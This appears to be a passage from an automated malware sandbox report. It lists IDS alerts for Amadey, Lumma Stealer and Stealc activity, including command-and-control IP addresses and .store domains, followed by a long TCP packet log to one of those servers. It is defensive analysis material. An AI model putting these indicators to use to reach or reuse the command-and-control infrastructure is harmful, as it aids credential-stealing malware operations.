                                                                                                                                                                                                                                                                                        2024-11-11T16:37:35.518093+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450059188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:36.871460+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450060185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:38.276696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450061188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:38.654677+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450061188.114.96.3443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.716645+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.4595571.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.747594+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.4603701.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.772371+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.4548031.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.797591+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.4544011.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.851688+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.4624791.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.876900+01002057121ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)1192.168.2.4611591.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.900979+01002057119ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)1192.168.2.4632281.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:42.925014+01002057101ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store)1192.168.2.4624561.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:43.731176+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.45006623.192.247.89443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:44.784815+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.45006623.192.247.89443TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:46.355392+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450074185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:37:53.851468+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450092185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-11-11T16:38:14.199428+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450123185.215.113.20680TCP

                                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.002468109 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.007400990 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.007494926 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.007628918 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.012900114 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.646925926 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.647025108 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.650057077 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.654898882 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.656547070 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.870919943 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.871012926 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.872486115 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.877325058 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074568033 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074657917 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074655056 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074671030 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074702024 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074721098 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.076141119 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.081234932 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278687954 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278729916 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278750896 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278764009 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278773069 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278785944 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278798103 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278799057 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278842926 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.279103041 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.279114008 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.279167891 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.279247999 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.279328108 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.280678988 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.285434008 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.484937906 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.485110998 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.502674103 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.502737045 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507468939 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507548094 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507558107 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507589102 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507599115 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507610083 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507613897 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.507638931 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.216617107 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.216768980 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.761441946 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.766325951 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961827993 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961848974 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961863041 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961913109 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961935997 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961950064 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961961985 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961962938 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961993933 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962019920 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962321043 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962374926 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962385893 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962430954 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962470055 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962481022 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962516069 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962518930 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962531090 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962542057 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962558985 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.962599993 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.963366032 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.963421106 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076430082 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076457024 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076468945 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076482058 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076493025 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076505899 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076517105 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076525927 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076531887 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076549053 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076560974 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076571941 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076575994 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076585054 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076598883 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076622009 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.076651096 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077009916 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077023029 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077042103 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077054024 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077064991 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077066898 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077080965 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077094078 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077109098 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077142000 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077965021 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077975988 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077986002 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.077999115 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.078022003 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.078057051 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187782049 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187840939 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187894106 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187905073 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187916040 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187918901 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187935114 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187947035 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.187957048 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188010931 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188157082 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188174009 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188188076 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188200951 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188211918 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188252926 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188569069 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188581944 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188601971 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188612938 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188620090 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188630104 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188646078 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.188669920 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189174891 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189187050 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189202070 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189224958 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189246893 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189255953 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189261913 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189276934 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189291954 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189304113 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189327955 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189794064 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189806938 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189817905 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189837933 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189842939 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189851046 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189865112 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189877987 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189877987 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189894915 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.189919949 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190015078 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190061092 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190815926 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190829039 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190840006 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190853119 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190861940 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190865993 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190877914 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190891027 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190895081 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190905094 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190913916 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190931082 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.190960884 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191673994 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191694975 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191704988 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191735029 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191752911 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191764116 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191764116 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191776991 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191787004 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191808939 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.191824913 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.268908978 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.268971920 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.268996000 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.269010067 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.269023895 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.269041061 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.269064903 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300806046 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300829887 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300841093 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300884008 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300898075 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300910950 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300924063 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300925970 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300939083 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300944090 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.300985098 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301143885 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301192045 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301192999 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301206112 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301229954 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301265001 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301388979 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301403046 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301414967 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301438093 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301464081 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301476002 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301522017 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301543951 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301563025 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301575899 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301592112 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301593065 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301615000 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301641941 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301848888 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301888943 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301901102 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301912069 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301925898 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301934958 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301939011 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.301955938 CET4973080192.168.2.4185.215.113.206
